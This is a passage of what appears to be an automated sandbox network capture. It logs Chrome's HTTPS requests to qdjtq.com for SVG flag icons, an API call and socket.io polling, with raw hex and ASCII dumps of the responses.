            2024-09-27 00:29:50 UTC16069INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 35 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 35 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 75 6e 69 74 65 64 2d 73 74 61 74 65 73 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 32 37 37 35 20 30 4c 31 2e 37 32 32 35 33 20 30 43 30 2e 37 37 31 31 37 34 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="united-states"> <path d="M21.2775 0L1.72253 0C0.771174
            2024-09-27 00:29:50 UTC9752INData Raw: 37 35 36 4c 30 2e 36 33 37 32 37 38 20 30 2e 35 32 30 38 36 34 4c 30 2e 37 32 31 30 31 32 20 30 2e 37 38 34 31 39 37 43 30 2e 37 33 31 38 38 33 20 30 2e 38 31 38 32 37 20 30 2e 36 39 32 38 34 36 20 30 2e 38 34 36 35 33 31 20 30 2e 36 36 33 36 30 32 20 30 2e 38 32 35 36 39 33 4c 30 2e 34 33 37 38 37 20 30 2e 36 36 35 30 37 33 4c 30 2e 32 31 32 31 33 37 20 30 2e 38 32 35 36 39 33 43 30 2e 31 38 32 38 39 33 20 30 2e 38 34 36 34 38 36 20 30 2e 31 34 33 39 34 36 20 30 2e 38 31 38 33 31 35 20 30 2e 31 35 34 37 32 37 20 30 2e 37 38 34 31 39 37 4c 30 2e 32 33 38 34 36 31 20 30 2e 35 32 30 38 36 34 4c 30 2e 30 31 35 32 34 34 36 20 30 2e 33 35 36 37 35 36 43 2d 30 2e 30 31 33 36 34 30 31 20 30 2e 33 33 35 35 36 20 30 2e 30 30 31 32 32 39 30 31 20 30 2e 32 38 39 39
            Data Ascii: 756L0.637278 0.520864L0.721012 0.784197C0.731883 0.81827 0.692846 0.846531 0.663602 0.825693L0.43787 0.665073L0.212137 0.825693C0.182893 0.846486 0.143946 0.818315 0.154727 0.784197L0.238461 0.520864L0.0152446 0.356756C-0.0136401 0.33556 0.00122901 0.2899


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            72192.168.2.649795129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC597OUTGET /modify/layout/images/51.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:50 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:50 GMT
            Content-Type: image/svg+xml
            Content-Length: 2455
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"997-1902494f420"
            2024-09-27 00:29:50 UTC2455INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 35 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 35 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 70 61 6e 61 6d 61 22 3e 0d 0a 20 20 20 20 3c 67 20 69 64 3d 22 47 72 6f 75 70 22 3e 0d 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 35 20 30 2e 33 39 33 34 33 37 4c
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="panama"> <g id="Group"> <path d="M11.5 0.393437L


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            73192.168.2.649796129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC597OUTGET /modify/layout/images/54.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:50 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:50 GMT
            Content-Type: image/svg+xml
            Content-Length: 1189
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"4a5-1902494f420"
            2024-09-27 00:29:50 UTC1189INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 37 70 78 22 20 68 65 69 67 68 74 3d 22 31 37 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 37 20 31 37 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 6d 65 6e 75 2d 28 31 29 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 2e 38 37 35 32 35 32 20 31 2e 36 31 39 30 34 4c 32 32 2e 31 35 34 31 20 31 2e 36 31 39 30 34 43 32
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="27px" height="17px" viewBox="0 0 27 17" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="menu-(1)"> <path d="M0.875252 1.61904L22.1541 1.61904C2


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            74192.168.2.649797129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC361OUTGET /api/MC40NTI5MDY4NzM1NDgwODk3 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:50 UTC164INHTTP/1.1 404 Not Found
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:50 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:50 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            75192.168.2.649799129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:50 UTC550OUTGET /socket.io/?EIO=4&transport=polling&t=P8muaSX HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:50 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:51 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 33 45 30 53 71 6b 77 4a 6f 6d 74 6d 67 5f 77 4b 41 48 74 76 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"3E0SqkwJomtmg_wKAHtv","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            76192.168.2.649800129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:50 UTC597OUTGET /modify/layout/images/55.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 14308
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"37e4-1902494f420"
            2024-09-27 00:29:51 UTC14308INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 31 39 70 78 22 20 68 65 69 67 68 74 3d 22 33 37 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 31 39 20 33 37 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 30 2e 34 38 34 32 38 38 38 37 22 20 79 31 3d 22 31 2e 30 31 34 38 38 38 33 22 20 78 32 3d 22 30 2e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="219px" height="37px" viewBox="0 0 219 37" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <linearGradient x1="0.48428887" y1="1.0148883" x2="0.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            77192.168.2.649801129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC360OUTGET /modify/layout/images/47.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC312INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 723
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"2d3-1902494f420"
            2024-09-27 00:29:51 UTC723INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 35 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 35 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 63 6f 6c 6f 6d 62 69 61 2d 28 32 29 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 32 2e 30 33 35 33 35 43 30 20 32 2e 39 38 32 33 31 20 30 2e 37 37 31 31 37 34 20 33
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="colombia-(2)"> <path d="M0 2.03535C0 2.98231 0.771174 3


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            78192.168.2.649802129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC662OUTPOST /socket.io/?EIO=4&transport=polling&t=P8muanP&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 2
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC2OUTData Raw: 34 30
            Data Ascii: 40
            2024-09-27 00:29:51 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:51 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            79192.168.2.649804129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8muanR&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 32
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:51 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 49 4b 77 59 32 66 47 6d 64 32 66 6a 4d 74 78 52 41 48 74 77 22 7d
            Data Ascii: 40{"sid":"IKwY2fGmd2fjMtxRAHtw"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            80192.168.2.649805129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC360OUTGET /modify/layout/images/48.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 13939
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"3673-1902494f420"
            2024-09-27 00:29:51 UTC13939INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 65 63 75 61 64 6f 72 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 32 2e 30 34 31 39 38 43 30 20 32 2e 39 39 32 30 32 20 30 2e 37 37 31 31 37 34 20 33 2e 37 36 32 32
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="ecuador"> <path d="M0 2.04198C0 2.99202 0.771174 3.7622


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            81192.168.2.649803129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC597OUTGET /modify/layout/images/56.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC314INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 4900
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"1324-1902494f420"
            2024-09-27 00:29:51 UTC4900INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 31 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 14</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            82192.168.2.649807129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC360OUTGET /modify/layout/images/49.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC312INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 794
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"31a-1902494f420"
            2024-09-27 00:29:51 UTC794INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 70 65 72 75 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 2e 37 32 32 35 33 20 30 43 30 2e 37 37 31 31 37 34 20 30 20 30 20 30 2e 37 37 33 31 35 20 30 20 31 2e 37 32 36
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="peru"> <path d="M1.72253 0C0.771174 0 0 0.77315 0 1.726


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            83192.168.2.649808129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC360OUTGET /modify/layout/images/51.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 2455
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"997-1902494f420"
